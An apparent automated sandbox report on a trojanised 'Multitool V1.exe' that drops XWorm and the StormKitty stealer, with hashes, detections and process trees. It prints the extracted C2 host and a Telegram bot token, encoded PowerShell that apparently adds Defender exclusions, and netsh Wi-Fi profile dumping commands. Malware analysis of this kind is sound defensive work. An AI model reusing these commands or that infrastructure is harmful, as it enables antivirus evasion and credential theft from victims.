Analysis
-
max time kernel
21s -
max time network
20s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2025, 23:30
Static task
static1
Behavioral task
behavioral1
Sample
Multitool V1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Multitool V1.exe
Resource
win10v2004-20250314-en
General
-
Target
Multitool V1.exe
-
Size
307KB
-
MD5
520f8ed0d73dbc6540fc80ac0c3847e1
-
SHA1
81476c36b9ea1b6d18864b90310eb95ec20e5475
-
SHA256
b148b01f921c8ee6aab7c5cb0b27b494f7ff5632f5a7dd2cbd1ccf206a5eb1ba
-
SHA512
0981f5323101a214f1ee6e57f5d10b2136213ef88b4b44e1bd769114734679c2439f6338df585712137ef01684cc7b2658a3820f79da0b196c2e7a11bb06b2e4
-
SSDEEP
6144:aMCOuWBJL5pt0UA8yTHsRRs6kkU7ezfQE62e3goypHp/3EvCcp3yVaG:aMCOucJL5pEDkU7Me3gpQTyVaG
Malware Config
Extracted
xworm
127.0.0.1:38960
metherium-38960.portmap.host:38960
-
Install_directory
%AppData%
-
install_file
host.exe
-
telegram
https://api.telegram.org/bot7283946415:AAGGT2xYjdDOFdezS7k5STvPS9SoyGQdKEg
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0013000000023f42-4.dat family_xworm behavioral2/memory/3664-23-0x0000000000F30000-0x0000000000F4A000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x00090000000240b4-14.dat family_stormkitty behavioral2/memory/3300-25-0x00000000000F0000-0x000000000012C000-memory.dmp family_stormkitty -
Stormkitty family
-
Xworm family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation Multitool V1.exe -
Executes dropped EXE 2 IoCs
pid Process 3664 client.exe 3300 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 5 ipinfo.io 6 ipinfo.io -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 3888 3300 WerFault.exe 92 -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Multitool V1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2480 cmd.exe 4936 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 5044 powershell.exe 3516 powershell.exe 3516 powershell.exe 5044 powershell.exe 3300 svchost.exe 3300 svchost.exe 3300 svchost.exe 3300 svchost.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3664 client.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeDebugPrivilege 3300 svchost.exe Token: SeDebugPrivilege 2472 taskmgr.exe Token: SeSystemProfilePrivilege 2472 taskmgr.exe Token: SeCreateGlobalPrivilege 2472 taskmgr.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe 2472 taskmgr.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 348 wrote to memory of 5044 348 Multitool V1.exe 87 PID 348 wrote to memory of 5044 348 Multitool V1.exe 87 PID 348 wrote to memory of 5044 348 Multitool V1.exe 87 PID 348 wrote to memory of 3516 348 Multitool V1.exe 89 PID 348 wrote to memory of 3516 348 Multitool V1.exe 89 PID 348 wrote to memory of 3516 348 Multitool V1.exe 89 PID 348 wrote to memory of 3664 348 Multitool V1.exe 91 PID 348 wrote to memory of 3664 348 Multitool V1.exe 91 PID 348 wrote to memory of 3300 348 Multitool V1.exe 92 PID 348 wrote to memory of 3300 348 Multitool V1.exe 92 PID 348 wrote to memory of 3300 348 Multitool V1.exe 92 PID 3300 wrote to memory of 2480 3300 svchost.exe 94 PID 3300 wrote to memory of 2480 3300 svchost.exe 94 PID 3300 wrote to memory of 2480 3300 svchost.exe 94 PID 2480 wrote to memory of 4168 2480 cmd.exe 99 PID 2480 wrote to memory of 4168 2480 cmd.exe 99 PID 2480 wrote to memory of 4168 2480 cmd.exe 99 PID 2480 wrote to memory of 4936 2480 cmd.exe 101 PID 2480 wrote to memory of 4936 2480 cmd.exe 101 PID 2480 wrote to memory of 4936 2480 cmd.exe 101 PID 2480 wrote to memory of 3804 2480 cmd.exe 102 PID 2480 wrote to memory of 3804 2480 cmd.exe 102 PID 2480 wrote to memory of 3804 2480 cmd.exe 102 PID 3300 wrote to memory of 4388 3300 svchost.exe 105 PID 3300 wrote to memory of 4388 3300 svchost.exe 105 PID 3300 wrote to memory of 4388 3300 svchost.exe 105 PID 4388 wrote to memory of 1092 4388 cmd.exe 107 PID 4388 wrote to memory of 1092 4388 cmd.exe 107 PID 4388 wrote to memory of 1092 4388 cmd.exe 107 PID 4388 wrote to memory of 2192 4388 cmd.exe 109 PID 4388 wrote to memory of 2192 4388 cmd.exe 109 PID 4388 wrote to memory of 2192 4388 cmd.exe 109 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe"C:\Users\Admin\AppData\Local\Temp\Multitool V1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AbABlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUAB5AHQAaABvAG4AIABJAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAE4AZQBlAGQAZQBlAGQAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBwAGEAYwAjAD4A"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAcwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAcAB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAbgB5ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Users\Admin\AppData\Roaming\client.exe"C:\Users\Admin\AppData\Roaming\client.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3300 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:4168
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4936
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵
- System Location Discovery: System Language Discovery
PID:3804
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 24643⤵
- Program crash
PID:3888
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:1092
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2192
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3300 -ip 33001⤵PID:4248
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2472
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
17KB
MD590258fe103e4449f3e202dee517114b7
SHA13a8dc3d397696ff139bdf9b648e473650a2acea3
SHA256096c4157f740da1f635a228ea9e37238b055230bc3d28091fe08617fbae30d22
SHA51294163225a0b3459a426af47a59f2e940639520ac0097d5bee57ef490216c20aa678cc813d9a840ea0e2a76cae8e413eec62dccd7feb89cc7a391b4d0ba26b494
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
213KB
MD523b83fe86a71cfba0d920fc658b3e010
SHA1c9fd9d1dc68bcef1bfb2845d4cc35ea2a5b9d6dc
SHA2566259f4d3310169e2b795e26a95ae21c7781abcb726322bc2eae0102546c816cf
SHA51222a49771a71a7b4504635692d0d671223cfb4a5d5f8d892918291f1b733336b935926b67ae032f4797e3067f1d4f4aee4bf2ff2b0f2f607ea465ea6e87365ea3
-
Filesize
79KB
MD510db01a500572f3468f4302068d6db1e
SHA190589a587d2ea36451a11e650a7b0041807b3be8
SHA256cae10e709d8f1dcf7deee20ddc601be133961ed8542f8505d3a016bbedfc9e84
SHA512c8cdd0eae61bc94f5978673e2bbda0b7916a87b7ab582036c3b95978b404f78202f3e8f31b32e050fd7298a682382b61db8c9b13828d97786ed052720fd3b8f9